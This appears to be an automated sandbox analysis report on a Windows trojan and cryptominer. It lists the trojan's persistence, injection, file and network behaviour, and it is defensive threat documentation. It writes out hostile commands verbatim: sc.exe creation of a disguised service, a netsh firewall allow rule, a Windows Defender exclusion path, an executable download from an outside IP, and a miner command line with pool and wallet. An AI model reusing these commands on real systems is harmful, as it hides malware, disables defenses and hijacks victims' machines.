Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\firefox default browser agent 0b748dae01bfe525
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\dszlnrlz] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dszlnrlz] 'ImagePath' = '%WINDIR%\SysWOW64\dszlnrlz\wvzxtzar.exe /d"%TEMP%\EED1.exe"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\dszlnrlz] 'ImagePath' = '%WINDIR%\SysWOW64\dszlnrlz\wvzxtzar.exe'
Creates the following services
- 'dszlnrlz' %WINDIR%\SysWOW64\dszlnrlz\wvzxtzar.exe /d"%TEMP%\EED1.exe"
- 'dszlnrlz' %WINDIR%\SysWOW64\dszlnrlz\wvzxtzar.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\dszlnrlz' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\explorer.exe
the following user processes:
- iexplore.exe
Hooks functions
in browsers
- iexplore.exe process, wininet.dll module
- firefox.exe process, nss3.dll module
Modifies file system
Creates the following files
- %APPDATA%\draiebv
- %APPDATA%\asheiur
- %TEMP%\eed1.exe
- %TEMP%\wvzxtzar.exe
- %TEMP%\12b6.exe
- %TEMP%\ixp000.tmp\setup_~1.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Sets the 'hidden' attribute to the following files
- %APPDATA%\draiebv
- %APPDATA%\asheiur
Deletes the following files
- %TEMP%\eed1.exe
Moves the following files
- from %TEMP%\wvzxtzar.exe to %WINDIR%\syswow64\dszlnrlz\wvzxtzar.exe
Deletes itself.
Network activity
Connects to
- 'ko####olitizm.org':80
- '15#.#40.201.174':443
- 'google.com':443
- 'wo##.#-poster.info':25000
- 'google.com':80
- '17#.#13.115.157':431
- '17#.#13.115.156':431
- '80.#6.75.4':431
- '17#.#13.115.155':431
- '17#.#13.115.154':431
- '17#.#13.115.153':431
- '17#.#13.115.158':487
- 'sv####lfheim.top':443
- 'mi##########m.mail.protection.outlook.com':25
- 'si##ky.net':443
- '18#.#74.137.41':80
- 'th#####nsicinsight.org':443
- '17#.#13.115.153':9080
- 'tr##sfer.sh':443
- 'cd#####.anonfiles.com':443
- 'vk.com':443
- 'vk.com':80
- 'dr##box.com':443
- 'gi##ub.com':443
- 'in###gram.com':443
- 'i.###tagram.com':443
TCP
HTTP GET requests
- http://vk.com/
- http://17#.###.115.153:9080/13.php via 17#.#13.115.153
- http://18#.#74.137.41/InsteadLaboratory.exe
- http://www.google.com/
- http://www.google.com/ncr
HTTP POST requests
- http://ko####olitizm.org/
- http://wo##.###oster.info:25000/ via wo##.#-poster.info
Other
- 'gi##ub.com':443
- '15#.#40.201.174':443
- 'google.com':443
- '17#.#13.115.155':431
- '17#.#13.115.154':431
- '17#.#13.115.157':431
- '17#.#13.115.156':431
- '17#.#13.115.153':431
- '17#.#13.115.158':487
- 'sv####lfheim.top':443
- 'si##ky.net':443
- 'th#####nsicinsight.org':443
- 'tr##sfer.sh':443
- 'cd#####.anonfiles.com':443
- 'vk.com':443
- 'dr##box.com':443
- 'in###gram.com':443
- 'i.###tagram.com':443
UDP
- DNS ASK ko####olitizm.org
- DNS ASK wo##.#-poster.info
- DNS ASK google.com
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK 23#.###.#12.82.cbl.abuseat.org
- DNS ASK 23#.###.##2.82.sbl-xbl.spamhaus.org
- DNS ASK 23#.###.#12.82.zen.spamhaus.org
- DNS ASK 23#.###.#12.82.bl.spamcop.net
- DNS ASK 23#.###.#12.82.dnsbl.sorbs.net
- DNS ASK sv####lfheim.top
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK si##ky.net
- DNS ASK th#####nsicinsight.org
- DNS ASK tr##sfer.sh
- DNS ASK cd#####.anonfiles.com
- DNS ASK vk.com
- DNS ASK dr##box.com
- DNS ASK gi##ub.com
- DNS ASK in###gram.com
- DNS ASK i.###tagram.com
Miscellaneous
Creates and executes the following
- '%TEMP%\eed1.exe'
- '%TEMP%\12b6.exe'
- '%WINDIR%\syswow64\dszlnrlz\wvzxtzar.exe' /d"%TEMP%\EED1.exe"
- '%APPDATA%\draiebv'
- '%TEMP%\ixp000.tmp\setup_~1.exe'
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\dszlnrlz\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\wvzxtzar.exe" %WINDIR%\SysWOW64\dszlnrlz\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create dszlnrlz binPath= "%WINDIR%\SysWOW64\dszlnrlz\wvzxtzar.exe /d\"%TEMP%\EED1.exe\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description dszlnrlz "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start dszlnrlz' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%APPDATA%\draiebv' ' (with hidden window)
- '%TEMP%\ixp000.tmp\setup_~1.exe' ' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\dszlnrlz\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\wvzxtzar.exe" %WINDIR%\SysWOW64\dszlnrlz\
- '%WINDIR%\syswow64\sc.exe' create dszlnrlz binPath= "%WINDIR%\SysWOW64\dszlnrlz\wvzxtzar.exe /d\"%TEMP%\EED1.exe\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description dszlnrlz "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start dszlnrlz
- '%WINDIR%\syswow64\svchost.exe'
- '<SYSTEM32>\taskeng.exe' {E180FE47-7AC1-483F-9F45-D70CD1C1A75E} S-1-5-21-1960123792-2022915161-3775307078-1001:jtrama\user:Interactive:[1]
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\explorer.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
